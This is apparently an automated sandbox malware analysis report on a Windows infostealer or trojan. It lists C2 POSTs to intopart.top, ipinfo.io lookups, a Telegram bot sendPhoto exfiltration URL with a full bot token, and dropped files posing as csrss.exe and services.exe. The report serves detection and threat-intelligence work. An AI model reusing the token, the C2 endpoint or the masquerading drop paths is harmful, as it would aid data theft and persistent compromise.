Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io

Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: intopart.top

Source: unknown

HTTP traffic detected: POST /bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="f4f047d2-73f9-4a98-88b4-47c11c582381"Host: api.telegram.orgContent-Length: 98854Expect: 100-continueConnection: Keep-Alive

Source: driverInto.exe, 00000004.00000002.1887420284.000000000374D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: svchost.exe, 0000001A.00000003.2074424875.0000015553448000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 0000001A.00000003.2074424875.0000015553448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000001A.00000003.2074424875.0000015553448000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000001A.00000003.2074424875.0000015553448000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000001A.00000003.2074424875.000001555347D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.26.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io
Source: powershell.exe, 00000009.00000002.3001390385.000001CD90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2187445854.0000022ECEC08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2181290021.000001C2B93A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055740947.000001CD80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2098904963.0000020A63538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2193786989.000002615E638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2187445854.0000022ECE9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2181290021.000001C2B9181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055740947.000001CD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2098904963.0000020A63311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2193786989.000002615E411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079916012.000002A734551000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2187445854.0000022ECEC08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2181290021.000001C2B93A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055740947.000001CD80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2098904963.0000020A63538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2193786989.000002615E638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000006.00000002.2187445854.0000022ECE9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2181290021.000001C2B9181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055740947.000001CD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2098904963.0000020A63311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2193786989.000002615E411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079916012.000002A734551000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: driverInto.exe, 00000004.00000002.1887420284.000000000374D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: driverInto.exe, 00000004.00000002.1887356359.0000000002F22000.00000002.00000001.01000000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887420284.000000000374D000.00000004.00000800.00020000.00000000.sdmp, VaRrMrQM.log.25.dr	String found in binary or memory: https://api.telegram.org/bot
Source: driverInto.exe, 00000004.00000002.1887420284.000000000374D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhotoX
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534A2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534D3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036F3000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887420284.00000000036C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887356359.0000000002F22000.00000002.00000001.01000000.00000000.sdmp, VaRrMrQM.log.25.dr	String found in binary or memory: https://ipinfo.io/country
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887356359.0000000002F22000.00000002.00000001.01000000.00000000.sdmp, VaRrMrQM.log.25.dr	String found in binary or memory: https://ipinfo.io/ip
Source: powershell.exe, 00000009.00000002.3001390385.000001CD90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3224549621.000002616E484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2

Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Code function: 0_2_01006FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_01006FAA

Source: C:\portintosvc\driverInto.exe	File created: C:\Windows\Registration\csrss.exe	Jump to behavior
Source: C:\portintosvc\driverInto.exe	File created: C:\Windows\Registration\886983d96e3d3e	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0100848E	0_2_0100848E
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_01016CDC	0_2_01016CDC
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_01017153	0_2_01017153
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_010251C9	0_2_010251C9
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_01014088	0_2_01014088
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_010100B7	0_2_010100B7
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_010040FE	0_2_010040FE
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_010143BF	0_2_010143BF
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_010162CA	0_2_010162CA
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_010032F7	0_2_010032F7
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0100C426	0_2_0100C426
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0102D440	0_2_0102D440
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0100F461	0_2_0100F461
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_010177EF	0_2_010177EF
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0100E9B7	0_2_0100E9B7
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_010319F4	0_2_010319F4
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0100286B	0_2_0100286B
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0102D8EE	0_2_0102D8EE
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_01024F9A	0_2_01024F9A
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0100EFE2	0_2_0100EFE2
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_01013E0B	0_2_01013E0B
Source: C:\portintosvc\driverInto.exe	Code function: 4_2_00007FFD9BAC0D78	4_2_00007FFD9BAC0D78
Source: C:\portintosvc\driverInto.exe	Code function: 4_2_00007FFD9BEBC1A1	4_2_00007FFD9BEBC1A1

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\DtICHrzA.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: String function: 0101EB78 appears 39 times
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: String function: 0101F5F0 appears 31 times
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: String function: 0101EC50 appears 56 times

Source: Vqzx4PFehn.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: driverInto.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: csrss.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: services.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XXPWErhsUbDrk.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XXPWErhsUbDrk.exe0.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XXPWErhsUbDrk.exe1.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@38/290@4/4

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Code function: 0_2_01006C74 GetLastError,FormatMessageW,

0_2_01006C74

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Code function: 0_2_0101A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_0101A6C2

Source: C:\portintosvc\driverInto.exe

File created: C:\Program Files (x86)\windows defender\services.exe

Jump to behavior

Source: C:\portintosvc\driverInto.exe

File created: C:\Users\user\Desktop\DtICHrzA.log

Jump to behavior

